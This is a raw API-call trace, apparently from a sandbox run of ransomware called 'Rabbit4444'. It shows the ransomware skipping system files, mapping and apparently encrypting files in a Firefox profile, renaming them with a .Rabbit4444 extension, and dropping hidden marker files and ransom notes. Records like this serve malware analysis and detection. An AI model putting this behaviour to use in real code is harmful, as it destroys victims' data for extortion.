lstrcmpiW (lpString1="previous.js", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.045] lstrcmpiW (lpString1="previous.js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.045] lstrcmpiW (lpString1="previous.js", lpString2="Rabbit4444.exe") returned -1 [0052.045] lstrcmpiW (lpString1="previous.js", lpString2=".") returned 1 [0052.045] lstrcmpiW (lpString1="previous.js", lpString2="..") returned 1 [0052.045] lstrcmpiW (lpString1="previous.js", lpString2="windows") returned -1 [0052.045] lstrcmpiW (lpString1="previous.js", lpString2="bootmgr") returned 1 [0052.045] lstrcmpiW (lpString1="previous.js", lpString2="pagefile.sys") returned 1 [0052.045] lstrcmpiW (lpString1="previous.js", lpString2="boot") returned 1 [0052.045] lstrcmpiW (lpString1="previous.js", lpString2="ids.txt") returned 1 [0052.045] lstrcmpiW (lpString1="previous.js", lpString2="NTUSER.DAT") returned 1 [0052.045] lstrcpyW (in: lpString1=0x130ebf6, lpString2="previous.js" | out: lpString1="previous.js") returned="previous.js" [0052.045] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js", dwFileAttributes=0x0) returned 1 [0052.048] lstrlenW (lpString="previous.js") returned 11 [0052.048] lstrlenW (lpString="Rabbit4444") returned 10 [0052.048] lstrcmpiW (lpString1="revious.js", lpString2="Rabbit4444") returned 1 [0052.048] lstrlenW (lpString=".dll") returned 4 [0052.048] lstrcmpiW (lpString1="s.js", lpString2=".dll") returned 1 [0052.048] lstrlenW (lpString=".lnk") returned 4 [0052.048] lstrcmpiW (lpString1="s.js", lpString2=".lnk") returned 1 [0052.048] lstrlenW (lpString=".ini") returned 4 [0052.048] lstrcmpiW (lpString1="s.js", lpString2=".ini") returned 1 [0052.048] lstrlenW (lpString=".sys") returned 4 [0052.048] lstrcmpiW (lpString1="s.js", lpString2=".sys") returned 1 [0052.048] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.048] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.049] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14335928929) returned 1 [0052.049] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=7991) returned 1 [0052.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0052.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0052.049] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2240, lpName=0x0) returned 0x298 [0052.050] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2240) returned 0x70000 [0052.051] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.051] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0052.051] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.051] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0052.051] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0052.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0052.052] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14336257161) returned 1 [0052.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0052.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0052.052] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.052] CloseHandle (hObject=0x298) returned 1 [0052.052] CloseHandle (hObject=0x278) returned 1 [0052.052] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js.Rabbit4444") returned 117 [0052.052] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\previous.js.rabbit4444"), dwFlags=0x1) returned 1 [0052.053] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43824196, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x43824196, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x1407dfe9, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x36df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="upgrade.js-20170824053622", cAlternateFileName="UPGRAD~1.JS-")) returned 1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="Rabbit4444.exe") returned 1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2=".") returned 1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="..") returned 1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="windows") returned -1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="bootmgr") returned 1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="pagefile.sys") returned 1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="boot") returned 1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="ids.txt") returned 1 [0052.053] lstrcmpiW (lpString1="upgrade.js-20170824053622", lpString2="NTUSER.DAT") returned 1 [0052.053] lstrcpyW (in: lpString1=0x130ebf6, lpString2="upgrade.js-20170824053622" | out: lpString1="upgrade.js-20170824053622") returned="upgrade.js-20170824053622" [0052.053] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622", dwFileAttributes=0x0) returned 1 [0052.054] lstrlenW (lpString="upgrade.js-20170824053622") returned 25 [0052.054] lstrlenW (lpString="Rabbit4444") returned 10 [0052.054] lstrcmpiW (lpString1="0824053622", lpString2="Rabbit4444") returned -1 [0052.054] lstrlenW (lpString=".dll") returned 4 [0052.054] lstrcmpiW (lpString1="3622", lpString2=".dll") returned 1 [0052.054] lstrlenW (lpString=".lnk") returned 4 [0052.054] lstrcmpiW (lpString1="3622", lpString2=".lnk") returned 1 [0052.054] lstrlenW (lpString=".ini") returned 4 [0052.054] lstrcmpiW (lpString1="3622", lpString2=".ini") returned 1 [0052.054] lstrlenW (lpString=".sys") returned 4 [0052.054] lstrcmpiW (lpString1="3622", lpString2=".sys") returned 1 [0052.054] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.054] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.054] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14336502952) returned 1 [0052.054] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=14047) returned 1 [0052.054] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0052.054] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0052.054] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x39e0, lpName=0x0) returned 0x298 [0052.055] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x39e0) returned 0x70000 [0052.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0052.058] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0052.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.058] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0052.058] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.058] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0052.058] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14336888877) returned 1 [0052.058] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0052.058] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0052.058] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.058] CloseHandle (hObject=0x298) returned 1 [0052.058] CloseHandle (hObject=0x278) returned 1 [0052.059] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622.Rabbit4444") returned 131 [0052.059] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\upgrade.js-20170824053622.rabbit4444"), dwFlags=0x1) returned 1 [0052.059] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43824196, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x43824196, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x1407dfe9, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x36df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="upgrade.js-20170824053622", cAlternateFileName="UPGRAD~1.JS-")) returned 0 [0052.059] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0052.059] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.059] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore-backups\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore-backups\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.060] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.060] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.061] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.061] CloseHandle (hObject=0x278) returned 1 [0052.061] CloseHandle (hObject=0x27c) returned 1 [0052.061] GetCurrentThreadId () returned 0xd98 [0052.061] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0052.061] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings" [0052.061] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1e00 | out: hHeap=0xe0000) returned 1 [0052.061] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0052.061] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings" [0052.061] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\" [0052.061] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\.BFC0E91B00AE8A0620D3" [0052.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\saved-telemetry-pings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.062] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.065] FlushFileBuffers (hFile=0x27c) returned 1 [0052.067] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.067] CloseHandle (hObject=0x27c) returned 1 [0052.068] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings") returned 95 [0052.068] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.068] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1472dc0f, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8d8cb9a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe85beac2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0052.068] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.068] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.068] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.068] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.068] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1472dc0f, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8d8cb9a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe85beac2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.068] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.068] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.068] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.068] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.068] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.068] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe85beac2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe85beac2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe85beac2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.068] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.068] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.068] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe85beac2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe85beac2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe85beac2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.068] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0052.068] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.068] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\saved-telemetry-pings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\saved-telemetry-pings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.069] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.069] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.070] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.070] CloseHandle (hObject=0x278) returned 1 [0052.070] CloseHandle (hObject=0x27c) returned 1 [0052.070] GetCurrentThreadId () returned 0xd98 [0052.070] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0052.070] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps" [0052.070] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119158 | out: hHeap=0xe0000) returned 1 [0052.070] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0052.070] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps" [0052.070] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\" [0052.070] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\.BFC0E91B00AE8A0620D3" [0052.070] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\minidumps\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.071] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.073] FlushFileBuffers (hFile=0x27c) returned 1 [0052.074] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.074] CloseHandle (hObject=0x27c) returned 1 [0052.075] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps") returned 83 [0052.075] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.075] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\minidumps\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe85beac2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0052.075] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.075] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.075] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.075] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.075] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe85beac2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.075] 